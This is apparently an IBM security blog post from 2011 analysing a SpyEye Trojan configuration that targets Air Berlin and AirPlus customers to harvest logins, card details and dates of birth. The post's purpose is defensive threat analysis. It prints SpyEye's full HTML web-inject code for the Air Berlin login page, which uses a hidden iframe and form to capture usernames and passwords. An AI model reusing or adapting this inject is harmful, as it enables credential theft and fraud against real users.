June 16, 2011 By Amit Klein 3 min read

IBM has uncovered a SpyEye configuration that targets users of two leading European airline travel websites: Air Berlin, the second-largest airline in Germany after Lufthansa, and AirPlus, the global provider of business travel services for companies. SpyEye exploits the user’s machine, not the websites, to carry out this fraud.

Travel Companies Become Trojan Targets

The two companies are far from randomly selected, but are, we believe, carefully chosen for their criminal revenue potential. One site accepts debit card payments, while the other caters to business users.

Air Berlin, now Europe’s sixth-largest airline, not only accepts debit and credit cards, but allows Austrian, Dutch and German citizens to pay by bank direct debit seven days before traveling. That means that criminals targeting an Air Berlin traveler from those countries stand a good chance of obtaining users’ personal details, including date of birth, which users must provide on the airline’s site, as well as their bank account details.

AirPlus, meanwhile, offers a variety of travel services for companies of all sizes on their website, all paid for by business payment cards, which are invariably linked to business bank accounts.

Since corporate accounts tend to carry much higher balances or credit limits than consumer accounts, they have much greater data-harvesting, and therefore revenue, potential for cybercriminals.

Data Harvesting Through HTML Injection

In the case of the Air Berlin attack, SpyEye attempts to harvest confidential user information, including username and password and other data that is entered on the targeted Web page. Since Air Berlin accepts bank debit card payments, the fraud potential is even more elevated.

SpyEye’s injection code captures the information on username and password details:

<WebInjects action="Inject|POST|GET"><Url><![CDATA[https://www.airberlin.com/site/yab/login/login*]]></Url><AuxUrl><![CDATA[]]></AuxUrl><WebInject><Before><![CDATA[<body>]]></Before><Data><![CDATA[<iframe name=ifr1 id=ifr1 src="https://www.airberlin.com/site/images/spacer.gif" width=0 height=0 border=none></iframe><form id=form7 name=form7 target=ifr1 method=post action="https://www.airberlin.com/site/images/spacer.gif"><input type="hidden" name="cc" id="cc" /><input type="hidden" name="pas" id="pas" /></form><script>function dosubmit(){document.form7.cc.value=document.getElementById('login').value;document.form7.pas.value=document.getElementById('pass').value;document.form7.submit();}</script>]]></Data><After><![CDATA[]]></After></WebInject><WebInject><Before><![CDATA[name="yabLogin" id="yabLogin"]]></Before><Data><![CDATA[ onclick="dosubmit()"]]></Data><After><![CDATA[]]></After></WebInject>

The AirPlus attack methodology, meanwhile, targets users of the Lufthansa Miles & More Visa credit card which offers bonus travel for purchases made using the card.

Similar to the Air Berlin attack, the SpyEye code targets the main login URL of the AirPlus portal:

<mark data-hasqtip="true" class="tempMark"><Url><![CDATA[https://portal.airplus.com/welcome*]]></Url> <Url><![CDATA[https://www.miles-and-more.kartenabrechnung.de/welcome*]]></Url></mark>

In this instance, SpyEye injects code that claims to be an anti-fraud enhancement into the user’s Web browser.

In reality, of course, this is a cleverly disguised attempt to phish user credentials from the unsuspecting customer of the AirPlus Web portal. Those credentials are quite comprehensive and include the card name and number, expiration date, CVV (signature strip) number and, as with the Air Berlin attack, the user’s date of birth.

The harvesting of the user’s date of birth opens up the possibility of identity theft and, we have observed, committing fraud by impersonating the user or using social engineering attack methods.


It is important to understand that cybercrime is now highly organized, with specialization of duties assigned to different members of the criminal hierarchy. That means that the darkware coding gangs behind the variants of SpyEye are now choosing their targets carefully for maximum revenue yield with minimal effort. In addition, by enhancing the fraudulent data yield from each victim, the possibilities for resale of data go way beyond that of the carder forums seen in the last few years.

We believe that the cybercriminal gang(s) behind the attacks are almost certainly using a semi-automated methodology of code development, allowing them to develop customized versions of the malware for specific purposes.

Clearly, the travel trade offers cybercriminals access to user and company account credentials with larger-than-normal account balances and credit card limits. Gaining access to Air Berlin bank account details in Austria, Germany and the Netherlands is an indication of targeting ingenuity.

Unfortunately, traditional antivirus security mechanisms are largely unable to protect corporate users from SpyEye infections because the malware uses targeted reconnaissance combined with signature-detection evasion techniques to get a foothold inside computers.

A better alternative for protecting Web-based services from becoming Trojan targets is to implement secure Web access. For example, browser-based tools that secure communication between the computer and cloud service provider website can prevent common attack methods like HTML injection and keylogging from grabbing data. Those same technologies can protect other browser-based applications, such as VPNs, CRM, retail, financial and collaboration systems that malware can exploit to steal user credentials and breach an enterprise’s security perimeter completely undetected.

We expect to see more specialized versions of SpyEye shortly.

More from Malware

Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing

12 min read - For the last year and a half, IBM X-Force has actively monitored the evolution of Hive0051’s malware capabilities. This Russian threat actor has accelerated its development efforts to support expanding operations since the onset of the Ukraine conflict. Recent analysis identified three key changes to capabilities: an improved multi-channel approach to DNS fluxing, obfuscated multi-stage scripts, and the use of fileless PowerShell variants of the Gamma malware. As of October 2023, IBM X-Force has also observed a significant increase in…

New Hive0117 phishing campaign imitates conscription summons to deliver DarkWatchman malware

8 min read - IBM X-Force uncovered a new phishing campaign likely conducted by Hive0117 delivering the fileless malware DarkWatchman, directed at individuals associated with major energy, finance, transport, and software security industries based in Russia, Kazakhstan, Latvia, and Estonia. DarkWatchman malware is capable of keylogging, collecting system information, and deploying secondary payloads. Imitating official correspondence from the Russian government in phishing emails aligns with previous Hive0117 campaigns delivering DarkWatchman malware, and shows a possible significant effort to induce a sense of urgency as…

ITG10 likely targeting South Korean entities of interest to the Democratic People’s Republic of Korea (DPRK)

7 min read - In late April 2023, IBM Security X-Force uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware, similar to what has been observed by others. ITG10's tactics, techniques and procedures (TTPs) overlap with APT37 and ScarCruft. The initial delivery method is conducted via a LNK file, which drops two Windows shortcut files containing obfuscated PowerShell scripts in charge of downloading a…

Ransomware renaissance 2023: The definitive guide to stay safer

2 min read - Ransomware is experiencing a renaissance in 2023, with some cybersecurity firms reporting over 400 attacks in the month of March alone. And it shouldn’t be a surprise: the 2023 X-Force Threat Intelligence Index found backdoor deployments — malware providing remote access — as the top attacker action in 2022, and aptly predicted 2022’s backdoor failures would become 2023’s ransomware crisis. Compounding the problem is the industrialization of the cybercrime ecosystem, enabling adversaries to complete more attacks, faster. Over the last…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today